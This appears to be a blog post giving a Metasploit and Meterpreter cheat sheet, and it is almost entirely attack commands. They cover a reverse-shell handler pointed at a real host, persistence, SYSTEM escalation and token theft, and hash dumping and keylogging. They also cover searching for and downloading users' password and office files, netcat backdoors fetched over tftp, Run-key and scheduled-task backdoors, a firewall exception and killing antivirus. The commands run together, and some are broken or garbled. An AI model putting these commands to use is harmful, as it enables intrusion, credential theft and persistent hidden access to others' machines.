Cheat sheet of Metasploit... Commands are as follows ..
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST rmccurdy.com set LPORT 21 set ExitOnSession false # set AutoRunScript pathto script you want to autorun after exploit is run set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30 exploit -j -z __________________________________________________ # file_autopwn rm -Rf /tmp/1 mkdir /tmp/1 rm -Rf ~/.msf3 wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR...s/nga10_02.pdf ./msfconsole db_driver sqlite3 db_create pentest11 setg LHOST 75.139.158.51 setg LPORT 21 setg SRVPORT 21 setg LPORT_WIN32 21 setg INFILENAME /tmp/file3.pdf use auxiliary/server/file_autopwn set OUTPATH /tmp/1 set URIPATH /msf set SSL true set ExitOnSession false set PAYLOAD windows/meterpreter/reverse_tcp setg PAYLOAD windows/meterpreter/reverse_tcp set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30 run _________________________________________________________ # shows all the scripts run [tab] _________________________________________________________ # persistence! broken ...if you use DNS name .. run persistence -r 75.139.158.51 -p 21 -A -X -i 30 _________________________________________________________ run get_pidgin_creds idletime sysinfo _________________________________________________________ # SYSTEM SHELL ( pick a proc that is run by system ) migrate 376 shell _________________________________________________________ # session hijack tokens use incognito impersonate_token "NT AUTHORITY\\SYSTEM" _______________________________________________________ # escalate to system use priv getsystem _________________________________________________________ execute -f cmd.exe -H -c -i -t execute -f cmd.exe -i -t ________________________________________________________ # list top used apps run prefetchtool -x 20 ________________________________________________________ # list installed apps run prefetchtool -p _________________________________________________________ run get_local_subnets _______________________________________________________ # find and download files run search_dwld "%USERPROFILE%\\my documents" passwd run search_dwld "%USERPROFILE%\\desktop passwd run search_dwld "%USERPROFILE%\\my documents" office run search_dwld "%USERPROFILE%\\desktop" office _________________________________________________________ # alternate download -r "%USERPROFILE%\\desktop" ~/ download -r "%USERPROFILE%\\my documents" ~/ ________________________________________________________ # alternate to shell not SYSTEM # execute -f cmd.exe -H -c -i -t __________________________________________________________________ # does some run wmic commands etc run winenum # rev shell the hard way run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080" ____________________________________________________ # An example of a run of the file to download via tftp of Netcat and then running it as a backdoor. run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4 run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4 ________________________________________________________ # vnc / port fwd for linux run vnc ________________________________________________________ # priv esc run kitrap0d ________________________________________________________ run getgui ________________________________________________________ # somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?! run killav run winemun run memdump run screen_unlock _________________________________________________________ upload /tmp/system32.exe C:\\windows\\system32\\ reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion \\run reg setval -k HKLM\\software\\microsoft\\windows\\currentversion \\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe" reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion \\Run -v system32 reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list reg setval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v sys reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v system32 upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\" ________________________________________________________ getuid ps getpid keyscan_start keyscan_dump migrate 520 portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80" portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666 _______________________________________________________ shell run myremotefileserver_mserver -h run myremotefileserver_mserver -p 8787 ______________________________________________________ run msf_bind run msf_bind -p 1975 rev2self getuid _______________________________________________________ getuid enumdesktops grabdesktop run deploymsf -f framework-3.3-dev.exe run hashdump run metsvc run scraper run checkvm run keylogrecorder run netenum -fl -hl localhostlist.txt -d google.com run netenum -rl -r 10.192.0.50-10.192.0.254 run netenum -st -d google.com run netenum -ps -r 10.192.0.50-254 __________________________________________________________ # Windows Login Brute Force Meterpreter Script run winbf -h _________________________________________________________ # upload a script or executable and run it uploadexec _________________________________________________________ # Using Payload As A Backdoor from a shell REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe" SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\metabkdr.exe" /ED 11/11/2011 __________________________________________________________ # kill AV this will not unload it from mem it needs reboot or kill from memory still ... Darkspy, Seem, Icesword GUI can kill the tasks catchme.exe -K "c:\Program Files\Kaspersky\avp.exe" catchme.exe -E "c:\Program Files\Kaspersky\avp.exe" catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" dummy |
.jpg)
0 comments:
Post a Comment